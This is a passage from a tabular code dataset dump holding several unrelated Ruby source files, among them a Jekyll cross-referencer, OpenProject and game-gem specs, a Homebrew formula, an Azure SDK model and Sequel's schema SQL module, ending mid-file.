hexsha (string, length 40) | size (int64, 2 to 1.01M) | content (string, 2 to 1.01M) | avg_line_length (float64, 1.5 to 100) | max_line_length (int64, 2 to 1k) | alphanum_fraction (float64, 0.25 to 1)
---|---|---|---|---|---
216e2a8f59393b45339841532da10e2745151794
| 5,484 |
# @author Mike Bland ([email protected])
require_relative 'api'
require_relative 'canonicalizer'
require_relative 'cross_reference_data'
require_relative 'name_canonicalizer'
require 'hash-joiner'
require 'lambda_map_reduce'
module TeamApi
# Builds cross-references between data sets.
class CrossReferencer
TEAM_FIELDS = %w(name last_name first_name full_name self)
PROJECT_FIELDS = %w(name full_name self)
WORKING_GROUP_FIELDS = %w(name full_name self)
GUILD_FIELDS = %w(name full_name self)
TAG_CATEGORIES = %w(skills interests)
TAG_XREF_FIELDS = %w(name slug self)
# Build cross-references between data sets.
# +site+:: Jekyll site object
def self.build_xrefs(site)
team, projects, working_groups, guilds = create_xref_data site
projects.create_xrefs team
name_xrefs = create_name_xrefs team
[working_groups, guilds].each do |grouplet|
grouplet.create_xrefs team, source_to_target_field: 'leads',
alternate_names: name_xrefs
grouplet.create_xrefs team, source_to_target_field: 'members',
alternate_names: name_xrefs
end
xref_tags_and_team_members site, TAG_CATEGORIES, team
xref_locations site.data, team, [projects, working_groups, guilds]
end
def self.create_xref_data(site)
[CrossReferenceData.new(site, 'team', TEAM_FIELDS),
CrossReferenceData.new(site, 'projects', PROJECT_FIELDS),
CrossReferenceData.new(site, 'working-groups', WORKING_GROUP_FIELDS),
CrossReferenceData.new(site, 'guilds', GUILD_FIELDS),
]
end
private_class_method :create_xref_data
def self.create_name_xrefs(team)
name_xrefs = {}
team.data.each do |member|
name_xrefs[member.last['deprecated_name']] =
member.last['name'] if member.last['deprecated_name']
end
name_xrefs
end
def self.xref_tags_and_team_members(site, tag_categories, team_xref)
team = (site.data['team'] || {})
tag_categories.each do |category|
xrefs = create_tag_xrefs(site, team.values, category, team_xref)
next if xrefs.empty?
site.data[category] = xrefs
replace_item_tags_with_xrefs category, xrefs, team.values
end
end
def self.replace_item_tags_with_xrefs(tag_category, tag_xrefs, items)
items.each do |item|
(item[tag_category] || []).map! do |tag|
tag_xrefs[tag].select { |field| TAG_XREF_FIELDS.include? field }
end
end
end
# Generates a Hash of { tag => cross-reference } generated from the tag
# `category` Arrays from each element of `items`.
#
# For example:
# TEAM = {
# 'mbland' => {
# 'name' => 'mbland', 'full_name' => 'Mike Bland',
# 'skills' => ['C++', 'Python'] },
# 'arowla' => {
# 'name' => 'arowla', 'full_name' => 'Alison Rowland',
# 'skills' => ['Python'] },
# }
# TEAM_XREF = CrossReferenceData.new site, 'team', ['name', 'full_name']
# create_tag_xrefs site, TEAM, 'skills', TEAM_XREF
#
# will produce:
# {'C++' => {
# 'name' => 'C++',
# 'slug' => 'c++',
# 'self' => 'https://.../skills/c++',
# 'members' => [{ 'name' => 'mbland', 'full_name' => 'Mike Bland' }],
# },
#
# 'Python' => {
# 'name' => 'Python',
# 'slug' => 'python',
# 'self' => 'https://.../skills/python',
# 'members' => [
# { 'name' => 'mbland', 'full_name' => 'Mike Bland' },
# { 'name' => 'arowla', 'full_name' => 'Alison Rowland' },
# ],
# },
# }
def self.create_tag_xrefs(site, items, category, xref_data)
items_to_tags = lambda do |item|
item_xref = xref_data.item_to_xref item
item[category].map { |tag| [tag, item_xref] } unless item[category].nil?
end
create_tag_xrefs = lambda do |tag, item_xrefs|
[tag, tag_xref(site, category, tag, item_xrefs)]
end
LambdaMapReduce.map_reduce(items, items_to_tags, create_tag_xrefs).to_h
end
def self.tag_xref(site, category, tag, members)
category_slug = Canonicalizer.canonicalize category
tag_slug = Canonicalizer.canonicalize tag
{ 'name' => tag,
'slug' => tag_slug,
'self' => File.join(Api.baseurl(site), category_slug, tag_slug),
'members' => NameCanonicalizer.sort_by_last_name(members || []),
}
end
def self.group_names_to_team_xrefs(team, collection_xrefs)
collection_xrefs.map do |xref|
xrefs = team.flat_map { |i| i[xref.collection_name] }.compact.uniq
[xref.collection_name, xrefs] unless xrefs.empty?
end.compact.to_h
end
# Produces an array of locations containing cross references to team
# members and all projects, working groups, guilds, etc. associated with
# each team member. All team member cross-references must already exist.
def self.xref_locations(site_data, team_xref, collection_xrefs)
location_xrefs = site_data['team'].values.group_by { |i| i['location'] }
.map do |location_code, team|
[location_code,
{
'team' => team.map { |member| team_xref.item_to_xref member },
}.merge(group_names_to_team_xrefs(team, collection_xrefs)),
] unless location_code.nil?
end
HashJoiner.deep_merge site_data['locations'], location_xrefs.compact.to_h
end
end
end
| 36.078947 | 80 | 0.630015 |
f72c1ba6c7ef6c364da17fc0bc360cc3e84c967a
| 126 |
json.array!(@users_gyms) do |users_gym|
json.extract! users_gym, :id
json.url users_gym_url(users_gym, format: :json)
end
| 25.2 | 50 | 0.746032 |
e298f00ad0b42e6eca9b67ebdcf6a6aa3650e28a
| 6,901 |
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe ProjectsHelper, type: :helper do
include ApplicationHelper
include ProjectsHelper
before do
User.delete_all
Version.delete_all
Project.delete_all
set_language_if_valid('en')
User.current = nil
end
let(:test_project) { FactoryBot.create :valid_project }
describe 'a version' do
let(:version) { FactoryBot.create :version, project: test_project }
it 'can be formatted' do
expect(format_version_name(version)).to eq("#{test_project.name} - #{version.name}")
end
it 'can be formatted within a project' do
@project = test_project
expect(format_version_name(version)).to eq(version.name)
end
it 'does not create a link, without permission' do
expect(link_to_version(version)).to eq("#{test_project.name} - #{version.name}")
end
describe 'with a valid user' do
let(:user) { FactoryBot.create :user, member_in_project: test_project }
before do login_as(user) end
it 'generates a link' do
expect(link_to_version(version)).to eq("<a href=\"/versions/#{version.id}\">#{test_project.name} - #{version.name}</a>")
end
it 'generates a link within a project' do
@project = test_project
expect(link_to_version(version)).to eq("<a href=\"/versions/#{version.id}\">#{version.name}</a>")
end
end
describe 'when generating options-tags' do
it 'generates nothing without a version' do
expect(version_options_for_select([])).to be_empty
end
it 'generates an option tag' do
expect(version_options_for_select([], version)).to eq("<option selected=\"selected\" value=\"#{version.id}\">#{version.name}</option>")
end
end
end
describe 'a system version' do
let(:version) { FactoryBot.create :version, project: test_project, sharing: 'system' }
it 'can be formatted' do
expect(format_version_name(version)).to eq("#{test_project.name} - #{version.name}")
end
end
describe 'an invalid version' do
let(:version) { Object }
it 'does not generate a link' do
expect(link_to_version(Object)).to be_empty
end
end
describe '#projects_with_level' do
let(:root) do
stub_descendant_of
end
def stub_descendant_of(*ancestors)
wp = FactoryBot.build_stubbed(:project)
allow(wp)
.to receive(:is_descendant_of?)
.and_return(false)
ancestors.each do |ancestor|
allow(wp)
.to receive(:is_descendant_of?)
.with(ancestor)
.and_return(true)
end
wp
end
let(:child1) { stub_descendant_of(root) }
let(:grandchild1) { stub_descendant_of(root, child1) }
let(:grandchild2) { stub_descendant_of(root, child1) }
let(:grandgrandchild1) { stub_descendant_of(root, child1, grandchild2) }
let(:child2) { stub_descendant_of(root) }
context 'when ordered by hierarchy' do
let(:projects) do
[root,
child1,
grandchild1,
grandchild2,
grandgrandchild1,
child2]
end
it 'returns the projects in the provided order with the appropriate levels' do
expect { |b| helper.projects_with_level(projects, &b) }
.to yield_successive_args [root, 0],
[child1, 1],
[grandchild1, 2],
[grandchild2, 2],
[grandgrandchild1, 3],
[child2, 1]
end
end
context 'when ordered arbitrarily' do
let(:projects) do
[grandchild1,
child1,
grandchild2,
grandgrandchild1,
child2,
root]
end
it 'returns the projects in the provided order with the appropriate levels' do
expect { |b| helper.projects_with_level(projects, &b) }
.to yield_successive_args [grandchild1, 0],
[child1, 0],
[grandchild2, 1],
[grandgrandchild1, 2],
[child2, 0],
[root, 0]
end
end
end
describe '#projects_level_list_json' do
subject { helper.projects_level_list_json(projects).to_json }
let(:projects) { [] }
describe 'with no project available' do
it 'renders an empty projects document' do
is_expected.to have_json_size(0).at_path('projects')
end
end
describe 'with some projects available' do
let(:projects) do
p1 = FactoryBot.build(:project, name: 'P1')
# a result from Project.project_level_list
[{ project: p1,
level: 0 },
{ project: FactoryBot.build(:project, name: 'P2', parent: p1),
level: 1 },
{ project: FactoryBot.build(:project, name: 'P3'),
level: 0 }]
end
it 'renders a projects document with the size of 3 of type array' do
is_expected.to have_json_size(3).at_path('projects')
end
it 'renders all three projects' do
is_expected.to be_json_eql('P1'.to_json).at_path('projects/0/name')
is_expected.to be_json_eql('P2'.to_json).at_path('projects/1/name')
is_expected.to be_json_eql('P3'.to_json).at_path('projects/2/name')
end
it 'renders the project levels' do
is_expected.to be_json_eql(0.to_json).at_path('projects/0/level')
is_expected.to be_json_eql(1.to_json).at_path('projects/1/level')
is_expected.to be_json_eql(0.to_json).at_path('projects/2/level')
end
end
end
end
| 32.097674 | 143 | 0.629619 |
33bc3b6212cdf67e05a37743bbc6585f1076f285
| 222 |
require "spec_helper"
RSpec.describe TailboardViewTool do
it "has a version number" do
expect(TailboardViewTool::VERSION).not_to be nil
end
it "does something useful" do
expect(false).to eq(true)
end
end
| 18.5 | 52 | 0.734234 |
acbfed89a69fca05ba80fc3043be3944881ab832
| 1,270 |
class Libmtp < Formula
desc "Implementation of Microsoft's Media Transfer Protocol (MTP)"
homepage "https://libmtp.sourceforge.io/"
url "https://downloads.sourceforge.net/project/libmtp/libmtp/1.1.18/libmtp-1.1.18.tar.gz"
sha256 "7280fe50c044c818a06667f45eabca884deab3193caa8682e0b581e847a281f0"
license "LGPL-2.1"
livecheck do
url :stable
end
bottle do
sha256 cellar: :any, arm64_big_sur: "4af12c090f3214200d4a37b9511c1fc1ba0269b40f26c0e9c45c4dbfe2c64474"
sha256 cellar: :any, big_sur: "5ebeb1696d5c7af72cb4a14f905dbde2cd871334ea392e7e8ff0305159c09aa1"
sha256 cellar: :any, catalina: "9b305e731b8d8608b688bb5c8bb98192d4879eb944fd4b08c09daadf367b68fc"
sha256 cellar: :any, mojave: "e4c497e80277170743a4ff8ddde06687a01f3afb053088b921b8399796f630ae"
sha256 cellar: :any, high_sierra: "704cd1e718e42dc9284ca020a11c1788d8a222cb8a4ca939d6b289cd17cf86ad"
end
depends_on "pkg-config" => :build
depends_on "libusb-compat"
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-mtpz"
system "make", "install"
end
test do
assert_match version.to_s, shell_output("#{bin}/mtp-getfile")
end
end
| 37.352941 | 106 | 0.731496 |
f8a423f08d772431b14ca48f62588fff4d5d4931
| 731 |
require 'studio_game/berserk_player'
module StudioGame
describe BerserkPlayer do
before do
$stdout = StringIO.new
@initial_health = 50
@player = BerserkPlayer.new("berserker", @initial_health)
end
it "does not go berserk when w00ted up to 5 times" do
1.upto(5) { @player.w00t }
expect(@player.berserker?).to be false
end
it "goes berserk when w00ted more than 5 times" do
1.upto(6) { @player.w00t }
expect(@player.berserker?).to be true
end
it "gets w00ted instead of blammed when it's gone berserk" do
1.upto(6) { @player.w00t }
1.upto(2) { @player.blam }
expect(@player.health).to eq(@initial_health + (8 * 15))
end
end
end
| 22.151515 | 65 | 0.634747 |
6af140b6c09009517d6532d185657f227fb64c68
| 2,898 |
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Security::Mgmt::V2015_06_01_preview
module Models
#
# Describes the allowed inbound and outbound traffic of an Azure resource
#
class ConnectableResource
include MsRestAzure
# @return [String] The Azure resource id
attr_accessor :id
# @return [Array<ConnectedResource>] The list of Azure resources that the
# resource has inbound allowed connection from
attr_accessor :inbound_connected_resources
# @return [Array<ConnectedResource>] The list of Azure resources that the
# resource has outbound allowed connection to
attr_accessor :outbound_connected_resources
#
# Mapper for ConnectableResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ConnectableResource',
type: {
name: 'Composite',
class_name: 'ConnectableResource',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
inbound_connected_resources: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'inboundConnectedResources',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ConnectedResourceElementType',
type: {
name: 'Composite',
class_name: 'ConnectedResource'
}
}
}
},
outbound_connected_resources: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'outboundConnectedResources',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ConnectedResourceElementType',
type: {
name: 'Composite',
class_name: 'ConnectedResource'
}
}
}
}
}
}
}
end
end
end
end
| 31.846154 | 79 | 0.503796 |
6235f45f139b0e2b13336678e58c9ae6e1f4b21d
| 1,402 |
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'regit/version'
Gem::Specification.new do |spec|
spec.name = "regit"
spec.version = Regit::VERSION
spec.authors = ["Frank Matranga"]
spec.email = ["[email protected]"]
spec.summary = %q{Discord bot for school servers.}
spec.description = %q{A Discord bot written in Ruby to create/manage school servers.}
spec.homepage = "https://github.com/Apexal/regit"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.13"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "minitest", "~> 5.0"
end
| 37.891892 | 96 | 0.664765 |
ff6edc358527386b20967270c710b55e0a563118
| 483 |
cask :v1 => 'charles' do
version '3.11.1'
sha256 'cdbacc5372851fe69613b676eaf0639dc7e7f82f321479f32efa6dcbecfa6913'
url "http://www.charlesproxy.com/assets/release/#{version}/charles-proxy-#{version}.dmg"
name 'Charles'
homepage 'http://www.charlesproxy.com/'
license :commercial
app 'Charles.app'
zap :delete => [
'~/Library/Application Support/Charles',
'~/Library/Preferences/com.xk72.charles.config',
]
end
| 28.411765 | 90 | 0.654244 |
2134b1ce9dbf2e8abf8a4c2be895399c1bd6693e
| 77 |
RouterVisualizer::Engine.routes.draw do
root to: 'visualizer#visualize'
end
| 25.666667 | 39 | 0.805195 |
e95abb6ea09739dc4dea98d0268c995a081c31a4
| 62 |
# frozen_string_literal: true
module Admin::SharesHelper
end
| 12.4 | 29 | 0.822581 |
bbeb34024eaa5599e200dfb9314ebebb32d05f88
| 40 |
module Chickout
VERSION = "0.0.1"
end
| 10 | 19 | 0.675 |
62ee2f855abfec9e3e4a726c43004b1eaf74e130
| 206 |
module Twilio
module REST
class Conference < InstanceResource
def initialize(uri, client, params={})
super uri, client, params
resource :participants
end
end
end
end
| 18.727273 | 44 | 0.645631 |
ac1b2dafe7779801e45aef21951acdaa3d0ba97b
| 1,029 |
# frozen_string_literal: true
require "rails_helper"
RSpec.describe BudgetXmlPresenter do
describe "#financial_year" do
context "when the financial_year is blank" do
it "returns nil for the start and end dates" do
budget = build(:budget, financial_year: "")
expect(described_class.new(budget).period_start_date).to be_nil
expect(described_class.new(budget).period_end_date).to be_nil
end
end
context "when the financial_year exists" do
it "returns IATI-formatted dates" do
budget = build(:budget, financial_year: 2020)
expect(described_class.new(budget).period_start_date).to eq(Date.parse("2020-04-01").strftime("%Y-%m-%d"))
expect(described_class.new(budget).period_end_date).to eq(Date.parse("2021-03-31").strftime("%Y-%m-%d"))
end
end
end
describe "#value" do
it "returns the value as a string" do
budget = build(:budget, value: 21.01)
expect(described_class.new(budget).value).to eq("21.01")
end
end
end
| 33.193548 | 114 | 0.685131 |
f7e56cbfd52dd04deec5fcf6b6e2c89adaa118d6
| 1,554 |
require File.dirname(__FILE__) + '/../spec_helper.rb'
describe RequestLogAnalyzer, 'when harvesting like munin-plugins-rails the YAML output' do
before(:each) do
cleanup_temp_files!
run("#{log_fixture(:rails_1x)} --dump #{temp_output_file(:yaml)}")
@rla = YAML::load(File.read(temp_output_file(:yaml)))
end
after(:each) do
cleanup_temp_files!
end
it "should contain database times" do
@rla["Database time"].each do |item|
item[1][:min].should_not be_nil
item[1][:max].should_not be_nil
item[1][:hits].should_not be_nil
item[1][:sum].should_not be_nil
end
end
it "should contain request times" do
@rla["Request duration"].each do |item|
item[1][:min].should_not be_nil
item[1][:max].should_not be_nil
item[1][:hits].should_not be_nil
item[1][:sum].should_not be_nil
end
end
it "should contain failed requests" do
@rla.keys.should include("Failed requests")
end
it "should contain Process blockers" do
@rla.keys.should include("Process blockers (> 1 sec duration)")
end
it "should contain HTTP Methods" do
@rla["HTTP methods"]["GET"].should_not be_nil
end
it "should contain HTTP Methods" do
@rla["HTTP methods"]["GET"].should_not be_nil
end
it "should contain view rendering times" do
@rla["View rendering time"].each do |item|
item[1][:min].should_not be_nil
item[1][:max].should_not be_nil
item[1][:hits].should_not be_nil
item[1][:sum].should_not be_nil
end
end
end
| 26.338983 | 90 | 0.664093 |
ed5d8abcf9c9252e187df2c0e9be76d072d9fd5c
| 11,737 |
module Sequel
module Schema
module SQL
AUTOINCREMENT = 'AUTOINCREMENT'.freeze
CASCADE = 'CASCADE'.freeze
COMMA_SEPARATOR = ', '.freeze
NO_ACTION = 'NO ACTION'.freeze
NOT_NULL = ' NOT NULL'.freeze
NULL = ' NULL'.freeze
PRIMARY_KEY = ' PRIMARY KEY'.freeze
RESTRICT = 'RESTRICT'.freeze
SET_DEFAULT = 'SET DEFAULT'.freeze
SET_NULL = 'SET NULL'.freeze
TYPES = Hash.new {|h, k| k}
TYPES[:double] = 'double precision'
UNDERSCORE = '_'.freeze
UNIQUE = ' UNIQUE'.freeze
UNSIGNED = ' UNSIGNED'.freeze
# The SQL to execute to modify the DDL for the given table name. op
# should be one of the operations returned by the AlterTableGenerator.
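# For example, an illustrative :add_column op (exact identifier quoting
# depends on the dataset in use):
#
#   alter_table_sql(:items, :op => :add_column, :name => :price, :type => :integer)
#   # => "ALTER TABLE items ADD COLUMN price integer"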
def alter_table_sql(table, op)
quoted_name = quote_identifier(op[:name]) if op[:name]
alter_table_op = case op[:op]
when :add_column
"ADD COLUMN #{column_definition_sql(op)}"
when :drop_column
"DROP COLUMN #{quoted_name}"
when :rename_column
"RENAME COLUMN #{quoted_name} TO #{quote_identifier(op[:new_name])}"
when :set_column_type
"ALTER COLUMN #{quoted_name} TYPE #{op[:type]}"
when :set_column_default
"ALTER COLUMN #{quoted_name} SET DEFAULT #{literal(op[:default])}"
when :set_column_null
"ALTER COLUMN #{quoted_name} #{op[:null] ? 'DROP' : 'SET'} NOT NULL"
when :add_index
return index_definition_sql(table, op)
when :drop_index
return drop_index_sql(table, op)
when :add_constraint
"ADD #{constraint_definition_sql(op)}"
when :drop_constraint
"DROP CONSTRAINT #{quoted_name}"
else
raise Error, "Unsupported ALTER TABLE operation"
end
"ALTER TABLE #{quote_schema_table(table)} #{alter_table_op}"
end
# Array of SQL DDL modification statements for the given table,
# corresponding to the DDL changes specified by the operations.
def alter_table_sql_list(table, operations)
operations.map{|op| alter_table_sql(table, op)}
end
# The SQL string specify the autoincrement property, generally used by
# primary keys.
def auto_increment_sql
AUTOINCREMENT
end
# SQL DDL fragment containing the column creation SQL for the given column.
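# For example, roughly (quoting depends on the dataset in use):
#
#   column_definition_sql(:name => :title, :type => :varchar, :null => false)
#   # => "title varchar(255) NOT NULL"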
def column_definition_sql(column)
return constraint_definition_sql(column) if column[:type] == :check
sql = "#{quote_identifier(column[:name])} #{type_literal(column)}"
sql << UNIQUE if column[:unique]
sql << NOT_NULL if column[:null] == false
sql << NULL if column[:null] == true
sql << " DEFAULT #{literal(column[:default])}" if column.include?(:default)
sql << PRIMARY_KEY if column[:primary_key]
sql << " #{auto_increment_sql}" if column[:auto_increment]
sql << column_references_sql(column) if column[:table]
sql
end
# SQL DDL fragment containing the column creation
# SQL for all given columns, used instead a CREATE TABLE block.
def column_list_sql(columns)
columns.map{|c| column_definition_sql(c)}.join(COMMA_SEPARATOR)
end
# SQL DDL fragment for column foreign key references
def column_references_sql(column)
sql = " REFERENCES #{quote_schema_table(column[:table])}"
sql << "(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(COMMA_SEPARATOR)})" if column[:key]
sql << " ON DELETE #{on_delete_clause(column[:on_delete])}" if column[:on_delete]
sql << " ON UPDATE #{on_delete_clause(column[:on_update])}" if column[:on_update]
sql
end
# SQL DDL fragment specifying a constraint on a table.
def constraint_definition_sql(constraint)
sql = constraint[:name] ? "CONSTRAINT #{quote_identifier(constraint[:name])} " : ""
case constraint[:constraint_type]
when :primary_key
sql << "PRIMARY KEY #{literal(constraint[:columns])}"
when :foreign_key
sql << "FOREIGN KEY #{literal(constraint[:columns])}"
sql << column_references_sql(constraint)
when :unique
sql << "UNIQUE #{literal(constraint[:columns])}"
else
check = constraint[:check]
sql << "CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}"
end
sql
end
# Array of SQL DDL statements, the first for creating a table with the given
# name and column specifications, and the others for specifying indexes on
# the table.
def create_table_sql_list(name, columns, indexes = nil)
sql = ["CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})"]
sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?
sql
end
# Default index name for the table and columns, may be too long
# for certain databases.
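# For example, with no schema qualifier:
#
#   default_index_name(:items, [:sku, :name]) # => "items_sku_name_index"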
def default_index_name(table_name, columns)
schema, table = schema_and_table(table_name)
"#{"#{schema}_" if schema and schema != default_schema}#{table}_#{columns.join(UNDERSCORE)}_index"
end
# The SQL to drop an index for the table.
def drop_index_sql(table, op)
"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}"
end
# SQL DDL statement to drop the table with the given name.
def drop_table_sql(name)
"DROP TABLE #{quote_schema_table(name)}"
end
# Proxy the filter_expr call to the dataset, used for creating constraints.
def filter_expr(*args, &block)
schema_utility_dataset.literal(schema_utility_dataset.send(:filter_expr, *args, &block))
end
# SQL DDL statement for creating an index for the table with the given name
# and index specifications.
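# For example, roughly (quoting depends on the dataset in use):
#
#   index_definition_sql(:items, :columns => [:sku], :unique => true)
#   # => "CREATE UNIQUE INDEX items_sku_index ON items (sku)"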
def index_definition_sql(table_name, index)
index_name = index[:name] || default_index_name(table_name, index[:columns])
if index[:type]
raise Error, "Index types are not supported for this database"
elsif index[:where]
raise Error, "Partial indexes are not supported for this database"
else
"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}"
end
end
# Array of SQL DDL statements, one for each index specification,
# for the given table.
def index_list_sql_list(table_name, indexes)
indexes.map{|i| index_definition_sql(table_name, i)}
end
# Proxy the literal call to the dataset, used for default values.
def literal(v)
schema_utility_dataset.literal(v)
end
# SQL DDL ON DELETE fragment to use, based on the given action.
# The following actions are recognized:
#
# * :cascade - Delete rows referencing this row.
# * :no_action (default) - Raise an error if other rows reference this
# row, allow deferring of the integrity check.
# * :restrict - Raise an error if other rows reference this row,
# but do not allow deferring the integrity check.
# * :set_default - Set columns referencing this row to their default value.
# * :set_null - Set columns referencing this row to NULL.
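#
# For example:
#
#   on_delete_clause(:cascade)   # => "CASCADE"
#   on_delete_clause(:set_null)  # => "SET NULL"
#   on_delete_clause(nil)        # => "NO ACTION"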
def on_delete_clause(action)
case action
when :restrict
RESTRICT
when :cascade
CASCADE
when :set_null
SET_NULL
when :set_default
SET_DEFAULT
else
NO_ACTION
end
end
def quote_schema_table(table)
schema, table = schema_and_table(table)
"#{"#{quote_identifier(schema)}." if schema}#{quote_identifier(table)}"
end
# Proxy the quote_identifier method to the dataset, used for quoting tables and columns.
def quote_identifier(v)
schema_utility_dataset.quote_identifier(v)
end
# SQL DDL statement for renaming a table.
def rename_table_sql(name, new_name)
"ALTER TABLE #{quote_schema_table(name)} RENAME TO #{quote_schema_table(new_name)}"
end
# Parse the schema from the database using the SQL standard INFORMATION_SCHEMA.
# If the table_name is not given, returns the schema for all tables as a hash.
# If the table_name is given, returns the schema for a single table as an
# array with all members being arrays of length 2. Available options are:
#
# * :reload - Get fresh information from the database, instead of using
# cached information. If table_name is blank, :reload should be used
# unless you are sure that schema has not been called before with a
# table_name, otherwise you may only getting the schemas for tables
# that have been requested explicitly.
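#
# For example:
#
#   schema(:items)                  # cached column information for items
#   schema(:items, :reload => true) # re-query the database for items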
def schema(table_name = nil, opts={})
table_name = table_name.to_sym if table_name
if opts[:reload] && @schemas
if table_name
@schemas.delete(table_name)
else
@schemas = nil
end
end
if @schemas
if table_name
return @schemas[table_name] if @schemas[table_name]
else
return @schemas
end
end
if table_name
@schemas ||= {}
if respond_to?(:schema_parse_table, true)
@schemas[table_name] ||= schema_parse_table(table_name, opts)
else
raise Error, 'schema parsing is not implemented on this database'
end
else
if respond_to?(:schema_parse_tables, true)
@schemas = schema_parse_tables(opts)
elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)
tables.each{|t| schema(t, opts)}
@schemas
else
raise Error, 'schema parsing is not implemented on this database'
end
end
end
# The dataset to use for proxying certain schema methods.
def schema_utility_dataset
@schema_utility_dataset ||= dataset
end
private
# Match the database's column type to a ruby type via a
# regular expression. The following ruby types are supported:
# integer, string, date, datetime, boolean, and float.
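#
# For example:
#
#   schema_column_type('varchar(255)')             # => :string
#   schema_column_type('timestamp with time zone') # => :datetime
#   schema_column_type('numeric(10,2)')            # => :decimal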
def schema_column_type(db_type)
case db_type
when /\Atinyint/
Sequel.convert_tinyint_to_bool ? :boolean : :integer
when /\A(int(eger)?|bigint|smallint)/
:integer
when /\A(character( varying)?|varchar|text)/
:string
when /\Adate\z/
:date
when /\A(datetime|timestamp( with(out)? time zone)?)\z/
:datetime
when /\Atime( with(out)? time zone)?\z/
:time
when "boolean"
:boolean
when /\A(real|float|double( precision)?)\z/
:float
when /\A(numeric(\(\d+,\d+\))?|decimal|money)\z/
:decimal
when "bytea"
:blob
end
end
# SQL fragment specifying the type of a given column.
def type_literal(column)
column[:size] ||= 255 if column[:type] == :varchar
elements = column[:size] || column[:elements]
"#{type_literal_base(column)}#{literal(Array(elements)) if elements}#{UNSIGNED if column[:unsigned]}"
end
# SQL fragment specifying the base type of a given column,
# without the size or elements.
def type_literal_base(column)
TYPES[column[:type]]
end
end
end
end
| 38.864238 | 149 | 0.622987 |
e2a312901a639951732a4da2688f4c81ccef2eef
| 1,989 |
require_relative 'helper'
module Psych
class TestHash < TestCase
class X < Hash
end
class HashWithCustomInit < Hash
attr_reader :obj
def initialize(obj)
@obj = obj
end
end
class HashWithCustomInitNoIvar < Hash
def initialize(obj)
# *shrug*
end
end
def setup
super
@hash = { :a => 'b' }
end
def test_referenced_hash_with_ivar
a = [1,2,3,4,5]
t1 = [HashWithCustomInit.new(a)]
t1 << t1.first
assert_cycle t1
end
def test_custom_initialized
a = [1,2,3,4,5]
t1 = HashWithCustomInit.new(a)
t2 = Psych.load(Psych.dump(t1))
assert_equal t1, t2
assert_cycle t1
end
def test_custom_initialize_no_ivar
t1 = HashWithCustomInitNoIvar.new(nil)
t2 = Psych.load(Psych.dump(t1))
assert_equal t1, t2
assert_cycle t1
end
def test_hash_subclass_with_ivars
x = X.new
x[:a] = 'b'
x.instance_variable_set :@foo, 'bar'
dup = Psych.load Psych.dump x
assert_cycle x
assert_equal 'bar', dup.instance_variable_get(:@foo)
assert_equal X, dup.class
end
def test_load_with_class_syck_compatibility
hash = Psych.load "--- !ruby/object:Hash\n:user_id: 7\n:username: Lucas\n"
assert_equal({ user_id: 7, username: 'Lucas'}, hash)
end
def test_empty_subclass
assert_match "!ruby/hash:#{X}", Psych.dump(X.new)
x = Psych.load Psych.dump X.new
assert_equal X, x.class
end
def test_map
x = Psych.load "--- !map:#{X} { }\n"
assert_equal X, x.class
end
def test_self_referential
@hash['self'] = @hash
assert_cycle(@hash)
end
def test_cycles
assert_cycle(@hash)
end
def test_ref_append
hash = Psych.load(<<-eoyml)
---
foo: &foo
hello: world
bar:
<<: *foo
eoyml
assert_equal({"foo"=>{"hello"=>"world"}, "bar"=>{"hello"=>"world"}}, hash)
end
end
end
| 20.936842 | 80 | 0.598793 |
d506197bd93c99f66ed8c7c7b76032c5943cec05
| 1,578 |
require 'time'
module Travis
module Tools
class Formatter
DAY = 24 * 60 * 60
TIME_FORMAT = "%Y-%m-%d %H:%M:%S"
CONFIG_KEYS = ['rvm', 'gemfile', 'env', 'jdk', 'otp_release', 'php', 'node_js', 'perl', 'python', 'scala', 'compiler', 'os']
